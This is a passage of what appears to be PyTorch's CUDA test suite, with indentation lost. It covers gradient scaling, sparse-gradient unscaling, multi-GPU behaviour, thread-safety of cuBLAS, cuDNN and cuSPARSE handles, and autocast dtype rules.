self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 2.0)
def test_grad_scaling_unscale_sparse(self, device="cuda", dtype=torch.float):
scaler = torch.cuda.amp.GradScaler()
inv_scale = torch.full((1,), 0.25, dtype=dtype, device=device)
found_inf = torch.empty((1,), dtype=dtype, device=device)
cur = found_inf.device
# As of d0c925f (4/16/20), docs are unclear about best API for sparse cuda tensor construction.
# https://pytorch.org/docs/master/tensors.html shows torch.sparse_coo_tensor(...), but it has no docstring.
# The same page shows several tensors with layout=torch.sparse_coo, but no constructors using that layout.
# Meanwhile, https://pytorch.org/docs/master/sparse.html shows torch.sparse.FloatTensor(...), which looks
# legacy and does not accept a device="cuda" kwarg. Going with torch.sparse_coo_tensor.
i = torch.tensor([[0, 1, 1],
[2, 0, 2]], device="cuda", dtype=torch.int64)
v = torch.tensor([16., 32., 64.], device="cuda", dtype=torch.float)
s = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
p = s.clone()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 0.0)
self.assertTrue(torch.allclose(p.grad.to_dense(), (s / 4).to_dense()))
v = torch.FloatTensor([16., 32., float('inf')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
v = torch.FloatTensor([16., 32., float('nan')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
p = s.clone().half()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone().half()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 0.0)
self.assertTrue(torch.allclose(p.grad.to_dense(), (s.half() / 4).to_dense()))
# Creates fp16 sparse tensor with duplicated indices (uncoalesced). The uncoalesced representation
# does not overflow in fp16, but the coalesced representation would, because 64000 + 64000 > fp16 max.
# _amp_non_finite_check_and_unscale_ should report an overflow here.
i = torch.LongTensor([[0, 1, 0],
[2, 0, 2]])
v = torch.FloatTensor([64000., 32., 64000.])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=torch.float16)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 1.0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_device_as_key(self):
# Ensure that different instances of "device" objects that point to the same device
# are treated as identical keys by dicts. GradScaler relies on this behavior, and may
# error otherwise in a way that's difficult to detect (a silent performance hit).
d = {}
t = torch.empty((1,), device="cuda:0")
dev0a = torch.device("cuda:0")
dev0b = torch.device("cuda:0")
dev1a = torch.device("cuda:1")
dev1b = torch.device("cuda:1")
self.assertTrue(hash(dev0a) == hash(dev0b))
self.assertTrue(hash(dev1a) == hash(dev1b))
d[dev0a] = "0a"
d[dev0b] = "0b"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "0b")
d[t.device] = "t"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "t")
d[dev1a] = "1a"
d[dev1b] = "1b"
self.assertTrue(len(d) == 2)
self.assertTrue(d[dev1a] == "1b")
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_scale(self):
scaler = torch.cuda.amp.GradScaler(init_scale=2.)
t0 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0")
t1 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:1")
# Create some nested iterables of tensors on different devices.
outputs = (t1.clone(), (t0.clone(), t1.clone()), [t0.clone(), (t1.clone(), t0.clone())])
outputs = scaler.scale(outputs)
self.assertTrue(outputs[0] == 8.0 and outputs[1][0] == 8.0 and outputs[1][1] == 8.0 and
outputs[2][0] == 8.0 and outputs[2][1][0] == 8.0 and outputs[2][1][1] == 8.0)
self.assertTrue(scaler._scale.device == t1.device)
def test_grad_scaling_state_dict(self):
for lazy_init_scale in True, False:
s0 = torch.cuda.amp.GradScaler(init_scale=3., growth_factor=4., backoff_factor=.5, growth_interval=2)
s1 = torch.cuda.amp.GradScaler(init_scale=6., growth_factor=7., backoff_factor=.8, growth_interval=1)
# sets a random value for load_state_dict to overwrite
s1._init_growth_tracker = 7
if lazy_init_scale:
# Dummy scale() call to ensure the scale tensor is lazily initialized.
s1.scale(torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0"))
self.assertTrue(isinstance(s1._scale, torch.cuda.FloatTensor))
s1.load_state_dict(s0.state_dict())
self.assertEqual(s1.get_scale(), 3.)
self.assertEqual(s1.get_growth_factor(), 4.)
self.assertEqual(s1.get_backoff_factor(), .5)
self.assertEqual(s1.get_growth_interval(), 2)
self.assertEqual(s1._init_growth_tracker, 0)
def _create_scaling_models_optimizers(self, device="cuda"):
# Create a module+optimizer that will use scaling, and a control module+optimizer
# that will not use scaling, against which the scaling-enabled module+optimizer can be compared.
mod_control = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
mod_scaling = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
s.data.copy_(c.data)
opt_control = torch.optim.SGD(mod_control.parameters(), lr=1.0)
opt_scaling = torch.optim.SGD(mod_scaling.parameters(), lr=1.0)
return mod_control, mod_scaling, opt_control, opt_scaling
def _create_scaling_case(self, device="cuda", dtype=torch.float):
data = [(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device))]
loss_fn = torch.nn.MSELoss().cuda()
skip_iter = 2
return self._create_scaling_models_optimizers(device=device) + (data, loss_fn, skip_iter)
# _run_scaling_case generalizes some single-optimizer test logic to avoid too much copy-pasting below.
def _run_scaling_case(self, run, unskipped, skipped, atol=1e-7):
# Ensure scaling can be disabled without changing user control flow.
for enabled in True, False:
mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter = self._create_scaling_case()
# For functionality, test with a modest initial scale, and an unrealistically-large growth factor
# so any potential errors with the growth factor handling will be magnified.
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
_ = run(data, mod_control, opt_control, scaler, loss_fn, skip_iter, False)
ret = run(data, mod_scaling, opt_scaling, scaler, loss_fn, skip_iter, True)
# Allows run() to optionally return a different scaler instance.
scaler = ret if ret else scaler
# If scaling was enabled, the scale factor should have been multiplied by the growth factor
# len(data) - skipped times and the backoff factor "skipped" times.
if enabled:
net_growth = scaler.get_growth_factor()**unskipped if unskipped > 0 else 1.0
net_backoff = scaler.get_backoff_factor()**skipped if skipped > 0 else 1.0
self.assertTrue(scaler.get_scale() == (128. * net_growth * net_backoff))
else:
self.assertTrue(scaler.get_scale() == 1.0)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
self.assertEqual(c, s, atol=atol, rtol=1e-05)
# Compares no scaling + no autocasting against scaling + autocasting.
def test_grad_scaling_autocast(self):
try_pickle = False
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
with torch.cuda.amp.autocast(enabled=try_scaling_api):
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
if try_pickle:
scaler = pickle.loads(pickle.dumps(scaler))
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
return scaler
# sets atol=1e-3 because we're comparing pure fp32 arithmetic vs a mixture of fp16 and fp32
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
# this will be picked up by try_pickle within run():
try_pickle = True
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
def test_grad_scaling_clipping(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm * scaler.get_scale())
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-5)
def test_grad_scaling_clipping_separate_unscale(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm, error_if_nonfinite=False)
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
@unittest.skipIf(IS_WINDOWS, 'FIXME: fix this test for Windows')
def test_grad_scaling_penalty(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
grad_params = torch.autograd.grad(scaler.scale(loss),
model.parameters(), create_graph=True)
inv_scale = 1. / scaler.get_scale()
grad_params = [p * inv_scale for p in grad_params]
else:
grad_params = torch.autograd.grad(loss, model.parameters(), create_graph=True)
grad_norm = 0
for grad in grad_params:
grad_norm += grad.pow(2).sum()
grad_norm = grad_norm.sqrt()
loss = loss + grad_norm
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
def test_grad_scaling_accumulation(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
iters_to_accumulate = 2
for i, (input, target) in enumerate(data):
output = model(input)
loss = loss_fn(output, target)
loss = loss / iters_to_accumulate
if try_scaling_api:
scaler.scale(loss).backward()
else:
loss.backward()
if (i + 1) % iters_to_accumulate == 0:
if try_scaling_api:
scaler.step(optimizer)
scaler.update()
optimizer.zero_grad()
else:
optimizer.step()
optimizer.zero_grad()
self._run_scaling_case(run, unskipped=2, skipped=0)
def test_grad_scaling_multiple(self):
# Tests gradient scaling with 2 models and 2 optimizers that both receive gradients from 2 losses.
# Some of the logic here cannot reuse the generic helper functions created for the 1-optimizer cases.
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers()
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input)
loss0 = loss_fn(0.3 * output0 + 0.7 * output1, target)
loss1 = loss_fn(0.6 * output0 - 0.4 * output1, target)
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertTrue(torch.allclose(c, s, atol=1e-7))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_multigpu(self):
# Same as above, but runs some of the models on device 1.
# GradScaler should transparently handle losses and gradients on multiple devices.
# This test could be combined with the test above, but I think it makes sense to treat
# multi-GPU operations separately.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers(device=dev1)
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input.to(dev1))
loss0 = loss_fn(0.3 * output0 + 0.7 * output1.to(dev0), target)
loss1 = loss_fn(0.6 * output0.to(dev1) - 0.4 * output1, target.to(dev1))
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
# Make sure the found_infs were collected properly across optimizers and devices.
if scaler.is_enabled():
self.assertTrue(len(scaler._found_inf_per_device(optimizer0)) == 1)
self.assertTrue(len(scaler._found_inf_per_device(optimizer1)) == 1)
self.assertTrue(scaler._found_inf_per_device(optimizer0)[dev0].item() == 0.)
self.assertTrue(scaler._found_inf_per_device(optimizer1)[dev1].item() ==
float(i == skip_iter))
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
# Copy mod_control1 and mod_scaling1 back the device 0 for comparison
mod_control1.to(dev0)
mod_scaling1.to(dev0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertTrue(torch.allclose(c, s, atol=1e-7))
def test_cublas_multiple_threads_same_device(self):
# Note, these parameters should be very carefully tuned
# Too small number makes it hard for the racing condition
# to happen, while too large number sometimes cause hang
size = 1024
num_threads = 2
trials = 3
test_iters = 100
weight = torch.ones((size, size), device='cuda')
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but actually now races with its gemm.
results[t] = torch.mm(results[t], weight)
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
# Test is flaky on Windows (https://github.com/pytorch/pytorch/issues/57401)
@unittest.skipIf(IS_WINDOWS, 'Test is flaky on Windows (see issue 57401)')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_multiple_threads_same_device(self):
# This function is intended to test the lazy creation and reuse of per-thread
# cudnn handles on each device in aten/src/ATen/cudnn/Handles.cpp.
# Failure here likely indicates something wrong with that logic.
weight = torch.ones((1, 1, 2, 2), device='cuda')
results = {}
num_threads = 2
trials = 3
test_iters = 1000
barrier = threading.Barrier(num_threads)
with torch.backends.cudnn.flags(enabled=True):
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for _ in range(test_iters):
# If all threads are sharing the same cudnn handle,
# the following sequence may occur:
# thread 0 calls setCuDNNStreamToCurrent()
# thread 1 calls setCuDNNStreamToCurrent()
# thread 0 launches its raw convolution, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but now races with its convolution.
results[t] = torch.nn.functional.conv2d(results[t], weight, padding=0)
results[t].div_(4.0)
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((1, 1, 2048, 2048), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(),
(2048 - test_iters) * (2048 - test_iters))
def test_cusparse_multiple_threads_same_device(self):
size = 1024
num_threads = 2
trials = 3
test_iters = 500
def ones_sparse(size):
a = torch.arange(size, device='cuda')
indices = torch.cartesian_prod(a, a).t()
values = torch.ones(size * size, device='cuda')
return torch.sparse_coo_tensor(indices, values)
weight = ones_sparse(size)
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but actually now races with its gemm.
results[t] = weight.mm(results[t])
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
def _run_autocast_outofplace(self, op, args, run_as_type, out_type=None, module=torch, add_kwargs=None):
# helper to cast args
def cast(val, to_type):
if isinstance(val, torch.Tensor):
return val.to(to_type) if val.is_floating_point() else val
elif isinstance(val, collections.abc.Iterable):
return type(val)(cast(v, to_type) for v in val)
else:
return val
if add_kwargs is None:
add_kwargs = {}
self.assertFalse(torch.is_autocast_enabled())
with torch.cuda.amp.autocast():
self.assertTrue(torch.is_autocast_enabled())
out_type = out_type if out_type is not None else run_as_type
output = output_method = None
# Try module.* variant, if requested:
if module is not None and hasattr(module, op):
output = getattr(module, op)(*args, **add_kwargs)
if isinstance(output, torch.Tensor):
self.assertTrue(out_type == output.dtype,
"autocast for torch.{} produced {}, should produce {}"
.format(op, output.dtype, out_type))
# Try Tensor.* variant:
if hasattr(torch.Tensor, op):
output_method = getattr(args[0], op)(*args[1:], **add_kwargs)
if isinstance(output_method, torch.Tensor):
self.assertTrue(out_type == output_method.dtype,
"autocast for torch.{} produced {}, should produce torch.{}"
.format(op, output_method.dtype, out_type))
self.assertTrue((output is not None) or (output_method is not None),
"{} not found as an attribute on either Tensor or the requested module {}".format(
op, module))
# Accounts for ops that return Tensors, iterables, and other non-Tensors.
# For example, lstm_cell returns a tuple and equal returns bool.
def compare(first, second):
if isinstance(first, torch.Tensor):
return torch.equal(first, second)
elif isinstance(first, collections.abc.Iterable):
return all(compare(f, s) for f, s in zip(first, second))
else:
return first == second
# If both torch.* and Tensor.* variants were found, check outputs are identical
if (output is not None) and (output_method is not None):
self.assertTrue(type(output) == type(output_method))
comparison = compare(output, output_method)
self.assertTrue(comparison, "torch.{0} result did not match Tensor.{0} result".format(op))
# Compare numerics to Python-side "autocasting" that (we expect) does the same thing
# as the C++-side autocasting, and should be bitwise accurate.
output_to_compare = output if output is not None else output_method
with torch.cuda.amp.autocast(enabled=False):
self.assertFalse(torch.is_autocast_enabled())
if module is not None and hasattr(module, op):
control = getattr(module, op)(*cast(args, run_as_type), **add_kwargs)
else:
control = getattr(args[0].to(run_as_type), op)(*cast(args[1:], run_as_type), **add_kwargs)
self.assertTrue(type(output_to_compare) == type(control))
comparison = compare(output_to_compare, control)
self.assertTrue(comparison, "torch.{} result did not match control".format(op))
self.assertTrue(torch.is_autocast_enabled())
self.assertFalse(torch.is_autocast_enabled())
def args_maybe_kwargs(self, op_with_args):
if len(op_with_args) == 2:
return op_with_args[0], op_with_args[1], {}
else:
return op_with_args[0], op_with_args[1], op_with_args[2]
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
if not skip_test:
self._run_autocast_outofplace(op, args, torch.float16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp32(self):
for op_with_args in self.autocast_lists.torch_fp32:
op, args, maybe_kwargs = self.args_maybe_kwargs(op_with_args)
self._run_autocast_outofplace(op, args, torch.float32, add_kwargs=maybe_kwargs)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_need_autocast_promote(self):
for op, args in self.autocast_lists.torch_need_autocast_promote:
self._run_autocast_outofplace(op, args, torch.float32)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.torch_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, out_type=out_type)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp32(self):
for op, args in self.autocast_lists.nn_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_linalg_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.linalg_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._linalg)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.methods_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp32(self):
for op, args in self.autocast_lists.methods_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.methods_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, module=None, out_type=out_type)
def test_autocast_banned(self):
with torch.cuda.amp.autocast():
for op, args, module in self.autocast_lists.banned:
with self.assertRaises(RuntimeError):
getattr(module, op)(*args)
def test_autocast_ignored_types(self):
with torch.cuda.amp.autocast():
for ignore_type in (torch.double, torch.int32):
a_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
b_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
c_16 = torch.ones((8, 8), dtype=torch.float16, device="cuda:0")
# Tests if CastPolicy::fp16 ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with self.assertRaises(RuntimeError):
torch.mm(a_ignore, c_16)
with torch.cuda.amp.autocast(enabled=False):
type_no_autocast = torch.mm(a_ignore, b_ignore).dtype
self.assertTrue(torch.mm(a_ignore, b_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32 ops ignore double and int
with torch.cuda.amp.autocast(enabled=False):
type_no_autocast = torch.pow(a_ignore, 2.0).dtype
self.assertTrue(torch.pow(a_ignore, 2.0).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_set_opt_dtype ops ignore double and int
with torch.cuda.amp.autocast(enabled=False):
type_no_autocast = torch.sum(a_ignore).dtype
self.assertTrue(torch.sum(a_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_append_dtype ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with torch.cuda.amp.autocast(enabled=False):
type_no_autocast = torch.norm(a_ignore).dtype
self.assertTrue(torch.norm(a_ignore).dtype is type_no_autocast)
def test_autocast_custom_enabled(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd
def forward(ctx, a, b):
self.assertTrue(a.dtype is torch.float32)
self.assertTrue(b.dtype is torch.float32)
self.assertTrue(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertTrue(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), a.t().mm(grad)
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
y = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
with torch.cuda.amp.autocast():
output = mymm(x, y)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_custom_cast_inputs(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)
def forward(ctx, a, container, expect_type):
b = container[1][0]
self.assertTrue(a.dtype is expect_type)
self.assertTrue(b.dtype is expect_type)
self.assertFalse(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertFalse(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), None, None
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
# Puts one input tensor in a nested container. y's contained Tensor won't receive a gradient,
# because torch.autograd.Function can't hand gradients back to non-Tensor forward arguments.
# Sets requires_grad=False explicitly so we don't lie about expecting a gradient.
y = (0, {0: torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=False)})
with torch.cuda.amp.autocast():
output = mymm(x, y, torch.float32)
self.assertTrue(output.dtype is torch.float32)
loss = output.sum()
loss.backward()
# Tests if custom_fwd becomes a no-op when mymm runs outside an autocast-enabled region.
output = mymm(x, y, torch.float16)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_cat_jit(self):
# Reported at https://github.com/pytorch/pytorch/issues/38958
class Model(torch.nn.Module):
def forward(self):
a = torch.randn(1)
b = torch.randn(1)
c = torch.cat((a, b), 0)
d = torch.stack([c, c], 0)
return d
# The JIT here doesn't really matter, we just need to call
# cat via the boxed API
model = Model()
model_jit_script = torch.jit.script(model)
with torch.cuda.amp.autocast(True):
model()
model_jit_script()
# cudnn RNNs require special backend handling (weights are cast to FP16 and reflattened)
# so they get a dedicated test.
# Despite the large number of RNN cases it tries, the test takes < 15 seconds on a Titan V (similar to V100).
@skipIfRocm
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_rnn(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
# seq, batch, features, hidden size
clses = ("RNN", "GRU", "LSTM")
T, B, F, H = 3, 4, 5, 6
dtypes = (torch.float16, torch.float32)
